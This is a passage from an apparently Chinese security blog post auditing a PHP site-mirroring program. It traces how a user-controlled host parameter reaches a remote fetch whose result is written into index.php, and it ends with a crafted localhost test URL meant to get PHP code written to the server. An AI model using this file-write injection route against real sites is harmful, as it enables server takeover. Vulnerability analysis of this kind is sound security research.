从上面看出,$sprocket_wheel_links变量可控,用strCut函数处理,来跟踪下strCut函数
[php]function strCut($strContent,$StartStr,$EndStr,$CutType=2) {
$s1=0;
$s2=0;
$cutStr = "";
switch($CutType) {
case 1:
$s1 = strpos($strContent, $StartStr);
if ($s1 === false) $s1 = 0;
$s2 = strpos($strContent, $EndStr, $s1) + strlen($EndStr);
break;
case 2:
$s1 = strpos($strContent, $StartStr);
if ($s1 === false) $s1 = 0;
else
$s1 += strlen($StartStr);
$s2 = strpos($strContent, $EndStr, $s1);
break;
}
$cutStr = substr($strContent, $s1, $s2-$s1);
return $cutStr;
}[/php]
简单的截取字符串,并无特殊过滤
但是所有生成的文件名都是以.txt结尾的,所以放弃了
于是看/pic/index.php
[php]for ($i=0;$i < count($Branch_directory); $i++) {
$check = CFolder("./".$Branch_directory[$i]."/");
if ($check == 1) {
WriteIn("./".$Branch_directory[$i]."/index.php",$NewFile_content);
} }
WriteIn("./index.php",$Content_mb);
chmod("index.php",0777);
echo "";
exit();} else {
$Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
WriteIn("./index.php",$Content_mb);
chmod("index.php",0777);
header("Location: index.php");
exit();} [/php]
找到代码:WriteIn("./index.php",$Content_mb);
看是是以php结尾,内容是$Content_mb
继续看$Content_mb
[php]$Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);[/php]
获取了之前的index.php并传入host
于是想到在[php]$Remote_server."/index.php?type=index.php&host=".$host_name[/php]里面有php代码就OK
于是构造
[php]http://localhost/fanzhan/?host=http://baidu.com/[/php]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论